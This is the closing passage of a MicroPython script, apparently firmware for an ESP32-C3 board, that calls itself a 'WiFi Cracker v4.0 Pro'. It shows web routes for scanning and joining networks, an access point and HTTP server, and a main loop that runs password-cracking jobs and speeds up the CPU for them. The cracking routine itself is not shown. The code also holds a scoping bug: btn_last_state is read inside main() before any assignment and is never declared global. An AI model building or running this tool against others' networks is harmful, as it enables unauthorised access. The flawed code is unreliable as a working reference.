            ap_if.active(False)
            do_blink(2)
            send_header(cl, '/tools')
        
        # WiFi Connection
        elif path == '/connect':
            send_header(cl)
            send_chunk(cl, html_connect_page())
        
        elif path == '/connect/scan':
            sta_if.active(True)
            wifi_scan_list = sta_if.scan()
            send_header(cl, '/connect')
        
        elif path == '/connect/disconnect':
            sta_if.disconnect()
            send_header(cl, '/connect')
        
        elif path == '/connect/to':
            ssid = qp.get('ssid', '')
            if ssid:
                send_header(cl)
                send_chunk(cl, html_connect_form(ssid))
            else:
                send_header(cl, '/connect')
        
        elif path == '/connect/do' and method == 'POST':
            ssid = body.get('ssid', '')
            password = body.get('password', '')
            if ssid:
                try:
                    sta_if.active(True)
                    sta_if.disconnect()
                    sta_if.connect(ssid, password)
                    # Wait a bit for connection
                    for _ in range(20):
                        if sta_if.isconnected():
                            break
                        time.sleep(0.5)
                except:
                    pass
            send_header(cl, '/connect')
        
        # About
        elif path == '/about':
            send_header(cl)
            send_chunk(cl, html_about_page())
        
        else:
            send_header(cl, '/')
    
    except Exception as e:
        print(f"Request error: {e}")

# ==================== Main Loop ====================
def main():
    global btn_last_press, btn_press_count, btn_debounce
    global last_gc, last_wdt_feed, last_freq_check
    
    print("=" * 40)
    print("ESP32-C3 WiFi Cracker v4.0 Pro")
    print("=" * 40)
    
    # Start AP
    ap_if.active(True)
    ap_if.config(essid=AP_SSID, password=AP_PASS, authmode=3)
    print(f"✅ AP Started: {AP_SSID}")
    print(f"📡 IP: {ap_if.ifconfig()[0]}")
    
    # Set initial frequency to idle
    set_freq_idle()
    print(f"⚡ CPU: {freq()//1000000}MHz (Idle)")
    
    # Setup server
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 80))
    server.listen(5)
    server.setblocking(False)
    print("🌐 Server listening on port 80")
    
    if wdt_enabled:
        print("🐕 Watchdog enabled")
    
    do_blink(5, fast=True)
    print("🚀 System ready!\n")
    
    while True:
        current_time = time.time()
        
        # 1. Feed watchdog
        if wdt_enabled and current_time - last_wdt_feed > 5:
            wdt.feed()
            last_wdt_feed = current_time
        
        # 2. Handle HTTP requests
        try:
            r, w, e = select.select([server], [], [], 0)
            if r:
                cl, addr = server.accept()
                cl.settimeout(3.0)
                handle_request(cl)
                cl.close()
        except OSError:
            pass
        except Exception as e:
            print(f"Server error: {e}")
        
        # 3. Process cracking job
        process_crack_job()
        
        # 4. Handle boot button (double-click detection with edge detection)
        btn_val = boot_btn.value()
        
        # Detect button press (falling edge: 1 -> 0)
        if btn_val == 0 and btn_last_state == 1:
            # Button just pressed
            if current_time - btn_last_press < 0.5:
                # Double-click detected!
                if ap_if.active():
                    ap_if.active(False)
                    print("🔴 Hotspot OFF (Double-click)")
                    do_blink(2, fast=True)
                else:
                    ap_if.active(True)
                    print("🟢 Hotspot ON (Double-click)")
                    do_blink(5, fast=True)
                btn_press_count = 0
                btn_last_press = 0  # Reset to prevent triple-click
            else:
                # First click
                btn_press_count = 1
                btn_last_press = current_time
        
        btn_last_state = btn_val
        
        # 5. Periodic maintenance
        if current_time - last_gc > 30:  # Every 30 seconds
            gc.collect()
            last_gc = current_time
        
        # 6. CPU frequency management
        if current_time - last_freq_check > 5:
            if crack_state['active']:
                set_freq_active()
            else:
                set_freq_idle()
            last_freq_check = current_time
        
        # 7. Small sleep to prevent CPU hogging
        if not crack_state['active']:
            time.sleep(0.02)  # 20ms idle sleep
        else:
            time.sleep(0.001)  # 1ms active sleep (faster cracking)

# ==================== Entry Point ====================
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print("\n👋 Shutting down...")
    except Exception as e:
        print(f"❌ Fatal error: {e}")
        time.sleep(5)
        reset()
